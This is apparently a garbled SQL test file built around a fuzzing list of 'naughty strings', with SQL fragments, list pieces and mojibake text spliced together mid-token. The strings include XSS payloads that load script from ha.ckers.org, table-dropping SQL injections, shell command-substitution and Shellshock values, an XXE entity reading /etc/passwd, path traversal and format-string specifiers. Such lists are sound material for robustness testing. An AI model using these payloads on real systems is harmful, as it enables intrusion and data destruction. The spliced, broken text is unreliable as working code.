SELECT * REPLACE substring(stext ="jav   ascript:alert(\'XSS\');">','<IMG SRC="jav&#x09;ascript:alert(\'XSS\');">','<IMG SRC="jav&#x0A;ascript:alert(\'XSS\');">','<IMG SRC="jav&#x0D;ascript:alert(\'XSS\');">','perl -e \'print "<IMG SRC=java\\0script:alert(\\"XSS\\")>";\' > out','<IMG SRC=" &#14;  javascript:alert(\'XSS\');">','<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>','<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert("XSS")>','<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>','<<SCRIPT>alert("XSS");//<</SCRIPT>','<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >','<SCRIPT SRC=//ha.ckers.org/.j>','<IMG SRC="javascript:alert(\'XSS\')"','<iframe src=http://ha.ckers.org/scriptlet.html <','\\";alert(\'XSS\');//','<u oncopy=alert()> Copy me</u>','<i onwheel=alert(1)> Scroll over me </i>','<plaintext>','http://a/%%30%30','</textarea><script>alert(123)</script>','1;DROP TABLE users','1\'; DROP TABLE users-- 1','\' OR 1=1 -- 1','\' OR \'1\'=\'1','\'; EXEC sp_MSForEachTable \'DROP TABLE ?\'; --',' ','%','_','--','--version','--help','$USER','/dev/null; touch /tmp/blns.fail ; echo','`touch /tmp/blns.fail`','$(touch /tmp/blns.fail)','@{[system "touch /tmp/blns.fail"]}','eval("puts \'hello world\'")','System("ls -al /")','`ls -al /`','Kernel.exec("ls -al /")','Kernel.exit(1)','%x(\'ls -al /\')','<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>','$HOME','$ENV{\'HOME\'}','%d',tp://ha.ckers.org/scriptlet.html <", \n  "\\\\\\";alert(\'XSS\');//", \n  "<u oncopy=alert()> Copy me</u>", \n  "<i onwheel=alert(1)> Scroll over me </i>", \n  "<plaintext>", \n  "http://a/%%30%30", \n  "</textarea><script>alert(123)</script>", \n  "1;DROP TABLE users", \n  "1\'; DROP TABLE users-- 1", \n  "\' OR 1=1 -- 1", \n  "\' OR \'1\'=\'1", \n  "\'; EXEC sp_MSForEachTable \'DROP TABLE ?\'; --",\n  " ", \n  "%", \n  "_", \n  "-", \n  "--", \n  "--version", \n  "--help", \n  "$USER", \n  "/dev/null; touch /tmp/blns.fail ; echo", \n  "`touch /tmp/blns.fail`", \n  "$(touch /tmp/blSELECT number
FROM
(
 ns.fail)", \n  "@{[system \\"touch /tmp/blns.fail\\"]}", \n  "eval(\\"puts \'hello world\'\\")", \n  "System(\\"ls -al /\\")", \n  "`ls -al /`", \n  "Kernel.exec(\\"ls -al /\\")", \n  "Kernel.exit(2)", \n  "%x(\'ls -al /\')", \n  "<?xml version=\\"1.0\\" encoding=\\"ISO-8859-1\\"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \\"file:///etc/passwd\\" >]><foo>&xxe;</foo>", \n  "$HOME", \n  "$ENV{\'HOME\'}", \n  "%d", \n  "%s%s%s%s%s", \n  "{0}", \n  "%*.*s", \n  "%@", \n  "%n", \n  "File:///", \n  "../../../../../../../../../../../etc/passwd%00", \n  "../../../../../../../../../../../etc/hosts", \n  "() { 0; }; touch /tmp/blns.shellshock1.fail;", \n  "() { _; } >_[$($())] { touch /tmp/blns.shellshock2.fail; }", \n  "<<< %s(un=\'%s\') = %u", \n  "+++ATH0", \n  "CON", \n  "PRN", \n  "AUX   SELECT zero AS number
    FROM remote('127.0.0.2', system.zeros)
    UNION ALL
    SELECT number +','ลโยดโฐหรยจหรโโโ','`โโฌโนโบ๏ฌ๏ฌโกยฐยทโโยฑ','โโโโ','ะะะะะะะะะะะะะะะะะะะะะะะะะะะะะะะะะกะขะฃะคะฅะฆะงะจะฉะชะซะฌะญะฎะฏะฐะฑะฒะณะดะตะถะทะธะนะบะปะผะฝะพะฟัััััััััััััััั','ููกูขูฃูคูฅูฆูงูจูฉ','โฐโดโต','โโโ','โฐโดโตโโโ','เธเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเน เธเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเ
-- Test simple logic over smaller batch of columns
SELECT
    -- x1, x2, x3, x4,
    xor(x1, x2, x3, x4) AS xor1,
    xor(xor(x1, x2), xor(x3, x4)) AS xor2,

    or(x1, x2, x3, x4) AS or1,
    or(x1 or x2, x3 or x4) AS or2,

    and(x1, x2, x3, x4) AS and1,
    and(x1 and x2, x3 and x4) AS and2
FROM (
    SELECT
        toUInt8(number % 2) AS x1,
        tuU, x10, x11) AS or1,
    or(x1, orนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเน เธเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเนเน','\'','"','\'\'','""','\'"\'','"\'\'\'\'"\'"','"\' \'"\'\'\'\'"','<foo val=โbarโ />','<foo val=โbarโ />','<foo val=โbarโ />','<foo val=`bar\' />','็ฐไธญใใใซใใใฆไธใใ','ใใผใใฃใผใธ่กใใชใใ','ๅ่ฃฝๆผข่ช','้จ่ฝๆผ','์ฌํ๊ณผํ์ ์ดํ์ฐ๊ตฌ์','์ฐฆ์ฐจ๋ฅผ ํ๊ณ ์จ ํฒ์๋งจ๊ณผ ์๋ค๋ฆฌ ๋๋ฐฉ๊ฐํ','็คพๆ็งๅญธ้ข่ชๅญธ็็ฉถๆ','์ธ๋๋ฐํ๋ฅด','๐๐ฑ๐น๐ฑ๐ฑธ๐ฒ๐ณ','๐ ๐๐๐๐๐ก๐๐ ๐๐๐ก๐๐/๐๐๐๐๐ค๐ ๐๐๐ ๐๐ ๐ ๐ก๐๐๐๐ค๐๐ ๐ฑ๐ ๐ ๐๐๐๐๐ก๐๐ ๐๐๐๐ค๐๐๐๐ก๐๐๐๐','่กจใใA้ทลรฉ๏ผข้รรยชฤรฑไธใ๐','ศบ','ศพ','ใฝเผผเบูอเบเผฝ๏พ ใฝเผผเบูอเบเผฝ๏พ','(๏ฝกโ โ โ๏ฝก)','๏ฝ๏ฝจ(ยดโ๏ฝโฉ','__๏พ(,_,*)','ใป(๏ฟฃโ๏ฟฃ)ใป:*:','๏พ๏ฝฅโฟใพโฒ(๏ฝกโโฟโ๏ฝก)โฑโฟ๏ฝฅ๏พ',',ใใป:*:ใปใโ( โป ฯ โป )ใใป:*:ใปใโ','(โฏยฐโกยฐ๏ผโฏ๏ธต โปโป)','(๏พเฒฅ็เฒฅ๏ผ๏พ๏ปฟ โปโโป','โฌโโฌใ( ยบ _ ยบใ)','( อกยฐ อส อกยฐ)','ยฏ\\_(ใ)_/ยฏ','๐','๐ฉ๐ฝ','๐จโ๐ฆฐ ๐จ๐ฟโ๐ฆฐ ๐จโ๐ฆฑ ๐จ๐ฟโ๐ฆฑ ๐ฆน๐ฟโโ๏ธ','๐พ ๐ ๐ ๐ ๐ ๐ ๐ ๐','๐ต ๐ ๐FROM system.licl;
